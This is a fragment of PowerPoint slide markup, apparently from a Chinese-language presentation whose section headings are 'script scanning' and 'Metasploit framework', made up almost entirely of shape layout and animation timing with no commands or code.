        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
